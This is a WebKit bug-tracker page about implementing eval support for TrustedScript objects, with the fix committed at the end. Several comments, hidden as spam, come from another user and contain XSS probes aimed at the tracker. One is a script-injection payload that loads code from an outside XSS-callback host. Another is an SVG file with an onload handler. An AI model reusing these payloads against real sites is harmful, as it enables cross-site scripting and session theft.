Bug 273184

Summary:

Implement eval support for TrustedScript objects

Product:

WebKit

Reporter:

Luke Warlow <lwarlow>

Component:

JavaScriptCore

Assignee:

Luke Warlow <lwarlow>

Status:

RESOLVED FIXED

Severity:

Normal

CC:

hackwanan, webkit-bug-importer

Priority:

Keywords:

InRadar

Version:

Safari 17

Hardware:

Unspecified

OS:

Unspecified

See Also:

https://github.com/web-platform-tests/wpt/pull/45879

Bug Depends on:

Bug Blocks:

267694

Attachments:

Description	Flags
'"><script src=https://xss.report/c/wananlife></script>	none
'"><script src=https://xss.report/c/wananlife></script>	none
hackerone wananlife	none
hackerone wananlife	none
hackerone wananlife	none
hackerone wananlife	none
hackerone wananlife	none

Description Luke Warlow 2024-04-24 06:35:25 PDT

Implement support for evaluating the code string associated with TrustedScript objects.

See Stage 3 proposal https://tc39.es/proposal-dynamic-code-brand-checks/ for more details.

Comment 1 Luke Warlow 2024-04-24 07:44:05 PDT

Pull request: https://github.com/WebKit/WebKit/pull/27691

Comment 2 wananlife 2024-04-30 05:37:45 PDT Comment hidden (spam)

Created attachment 471215 [details]
'"><script src=https://xss.report/c/wananlife></script>

Comment 3 wananlife 2024-04-30 05:44:04 PDT Comment hidden (spam)

Created attachment 471216 [details]
'"><script src=https://xss.report/c/wananlife></script>

Comment 4 wananlife 2024-04-30 05:51:58 PDT Comment hidden (spam)

Created attachment 471217 [details]
hackerone wananlife

Comment 5 wananlife 2024-04-30 05:54:07 PDT Comment hidden (spam)

Created attachment 471218 [details]
hackerone wananlife

Comment 6 wananlife 2024-04-30 05:57:11 PDT Comment hidden (spam)

Created attachment 471219 [details]
hackerone wananlife

Comment 7 wananlife 2024-04-30 06:02:23 PDT Comment hidden (spam)

Created attachment 471220 [details]
hackerone wananlife

Comment 8 wananlife 2024-04-30 06:05:21 PDT Comment hidden (spam)

Created attachment 471221 [details]
hackerone wananlife

Comment 9 wananlife 2024-04-30 06:08:14 PDT Comment hidden (spam)

Comment on attachment 471221 [details]
hackerone wananlife

<svg onload="alert('hack wananlife from hackerone')" xmlns="http://www.w3.org/2000/svg" width="300" height="300" viewBox="0 0 300 300">
    <!-- 背景矩形 -->
    <rect width="100%" height="100%" fill="#f0f0f0" />

    <!-- 圆形 -->
    <circle cx="150" cy="150" r="100" fill="#3498db" />

    <!-- 抽象的线条 -->
    <line x1="50" y1="150" x2="250" y2="150" stroke="#2ecc71" stroke-width="5" />

    <!-- 矩形 -->
    <rect x="120" y="120" width="60" height="60" fill="#e74c3c" />

    <!-- 文本 -->
    <text x="50%" y="50%" font-size="20" text-anchor="middle" fill="#ffffff" dy=".3em">Tech SVG</text>
</svg>

Comment 10 Radar WebKit Bug Importer 2024-05-01 06:36:13 PDT

<rdar://problem/127357526>

Comment 11 EWS 2024-05-23 07:50:58 PDT

Committed 279194@main (5e0f9b3cfb2b): <https://commits.webkit.org/279194@main>

Reviewed commits have been landed. Closing PR #27691 and removing active labels.